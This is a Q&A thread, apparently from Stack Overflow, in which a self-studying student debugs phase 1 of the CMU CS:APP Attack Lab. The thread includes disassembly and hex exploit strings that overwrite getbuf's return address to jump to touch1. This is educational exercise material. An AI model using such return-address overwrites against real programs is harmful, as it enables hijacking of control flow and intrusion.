# Buffer overflow exploit: Attack Lab phase 1 from CMU CS:APP

Tags: security, assembly, x86, reverse-engineering, code-injection

Phase One of the CMU Attack Lab assignment (original is [here](http://csapp.cs.cmu.edu/3e/attacklab.pdf)) asks for an exploit string to redirect the program to an existing procedure.

My understanding is that I need to know how much space stack to reserve for the `getbuf` function so that I can make a string of that much length and then add the address of `touch1`.

My objdump is the following:

```
000000000040193c <getbuf>:
  40193c:   48 83 ec 28             sub    $0x28,%rsp
  401940:   48 89 e7                mov    %rsp,%rdi
  401943:   e8 88 02 00 00          callq  401bd0 <Gets>
  401948:   b8 01 00 00 00          mov    $0x1,%eax
  40194d:   48 83 c4 28             add    $0x28,%rsp
  401951:   c3                      retq   

0000000000401952 <touch1>:
  401952:   48 83 ec 08             sub    $0x8,%rsp
  401956:   c7 05 bc e6 2d 00 01    movl   $0x1,0x2de6bc(%rip)        # 6e001c <vlevel>
  40195d:   00 00 00 
  401960:   bf e5 26 4b 00          mov    $0x4b26e5,%edi
  401965:   e8 36 16 01 00          callq  412fa0 <_IO_puts>
  40196a:   c7 05 7c e6 2d 00 01    movl   $0x1,0x2de67c(%rip)        # 6dfff0 <rlev>
  401971:   00 00 00 
  401974:   48 83 c4 08             add    $0x8,%rsp
  401978:   c3                      retq
```

As you can see my `getbuf` function is taking `0x28` space (40 decimal) decrementing `rsp`. So the string that I am using to exploit is the following:

```
//This should cross stack frame space for getbuf
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
//This should cross old rbp
00 00 00 00 00 00 00 00 
// Address of touch1, which should be placed instead of address of ret, thus exploiting the course of action.
52 19 40 00 00 00 00 00
```

Let's look at the `getbuf` function:

```
1 unsigned getbuf()
2 {
3 char buf[BUFFER_SIZE];
4 Gets(buf);
5 return 1;
6 }
```

We can see that buf should allocate a size. From the instruction, I can see that the whole function is taking `0x28` size. Now look at my understading of stack frame( this is 32 bit but the rationale is the same):
[image]

Now if my understading of stack frame is correct, then I should find the `RET` address at `8(%ebp)` or `48(%esp)` . Which means I need to traverse `0x28 + 0x4` space up to the higher memory and then give the address of my exploit function `touch1` which should return `touch1` instead of `RET`. What am I getting wrong? Is there anything wrong in my process of understading or I am not addressing something important?

Update:

I did a little trial and error. The following text just one byte away between `Type string:Ouch!: You caused a segmentation fault!` & `Type string:No exploit.  Getbuf returned 0x1`

```
aa aa aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa aa aa
aa aa

52 19 40 00 00 00 00 00
```

Also the follwing text:

```
aa aa aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa aa aa
aa aa aa aa aa aa

52 19 40 00
```

As per the comment section from jester, we can get segfault even after it crosses the `ret`. Then why even reducing one byte in my above texts still gives me either no exploit or seg fault?

Comment: Use gdb to identify the instruction address that is faulting,  trace your way back from that point to identify what leads to execution flow to that point.

Comment: Questions aren't off-topic because they are homework. There's nothing wrong with asking questions about homework, as long as you comply with our other guidelines, which include providing a [mcve], showing what you've tried, and explaining exactly where you're stuck. This question seems to do that (if it's missing something specific, you should just ask for it), and it's also fairly well written. I don't see a problem here. As for the honor code, that isn't our concern; it's between the author and their instructor. And I don't think this is actually HW anyway, given the dates in the assignment.

Comment: Getting a segfault might be normal, if it happens after the function you redirected to returns, given that you have removed a return address from the stack. Question is, does the `puts` execute first?

Comment: Linux glibc stdio has buffer mechanics. If you think that it is because of buffering, 1) append one more return address beyond `0x401952`(`touch1`) to be `0x40193c`(`getbuf`) or 2) use `setbuf -i0 -o0 ./executable`

Comment: @Jester Does it not? `getbuf` making a 0x28 space, which means old `rbp` will be in `0x8` above the stack frame for `getbuf`, and above that you should find the return address. So if I exploit 0x28 + 0x8 space and then inject the address of my function, why it should not do the exploitation?

Comment: @CodyGray You are right. I'm doing self-study and that's why I need help from this forum more than anyone else.

Comment: @amritanshu Please don't be so pedantic. Being pedantic is the #1 barrier to any learning process. When you realize a learner is putting effort and asking very constructive assistance that shows the learner really understands the underlying concepts, being pedantic only means the person supposed to assist the learner does not understand the concepts themselves to begin with.

Comment: It should run the exploit, yes. I just said, it's normal to have a segfault **after** that. It's unclear whether you see the `puts` execute or not. In other words, we don't know when the fault happens.

Comment: @Jester Please see my update.

Comment: @Jester I did trial & error assuming segfault is occurring after we reach . The explanation of that trial & error and result can be found at the Update section of my post. Please refer to the section.

Comment: Neither of the two strings in the update should do anything since both are 0x28 bytes long thus don't overwrite the return address. If you add an extra byte you will overwrite the return address, but not properly aligned so that will probably fault.

Comment: @Jester then how exactly they want us to do this assignment? Even when I add 8 more bytes after 40 bytes, assuming that should cross old rbp and reach ret, I get seg fault. What exactly the assignment wants us to do?

Comment: There is no "old rbp" on the stack, this code doesn't use that (or do you see a `push rbp` anywhere?) You just need 40 bytes then the exploit address. Do you have a link to the binary?

Comment: @Jester Please point your web browser to http://www.rapidshare.com.cn/8Jymb3O

Comment: I was hoping for the binary, it would take quite some effort to reassemble that dump.

Comment: @Jester hello jester, I don't know how can I retrieve binary. I only have an executable machine code file for `ctarget`

Comment: Yes, that's what I'd like to have :) So I can try and see what your problem might be.

Comment: But the file is really unreadable! I am not sure how can might help you but here it is: http://www.rapidshare.com.cn/JjV6lxp

Comment: Oh this is not a standalone program, it connects to some server and stuff. Nothing I can't hack though :)

Comment: Okay so I get `ouch1!: You called touch1() Ouch!: You caused a segmentation fault! Better luck next time FAILED`. Which is what I expected, as I said, you can have a fault after the detour. But you don't even get that?

Comment: Not sure what the task to achieve is, of course I can put an additional return address on the stack, if it's say `exit` then it will no longer fault.

Comment: @Jester I really appreciate your assistance to help me out. No, I don't even get ouch1!: You called touch1() . Details of the task can be found here: http://csapp.cs.cmu.edu/3e/attacklab.pdf

Comment: I used 40 placeholder bytes then the `52 19 40 00`.

Comment: Note that the pdf says `touch1` itself calls `exit` but the actual program doesn't do that.

Comment: @Jester yes I do get touch 1 and then seg fault! Thanks! How can I exit if touch1 does not call exit itself? Also, if you put it as answer then I can accept as well.

Comment: You can easily exit if you put its address next on the stack (but remember that addresses are 8 bytes, so use zeroes as appropriate). Not sure if that will help you, since then the code that talks to the server might not run.

Comment: @Jester maybe I should then return to the address that I have overwritten?

Comment: And I just put the retq address of getbuf after my exploit string  but got segfault.

Comment: @Jester I got it! I have to send the return control to the address pointed by test function's line 5, it's in the assignment writeup.Thank you for your efforts btw :).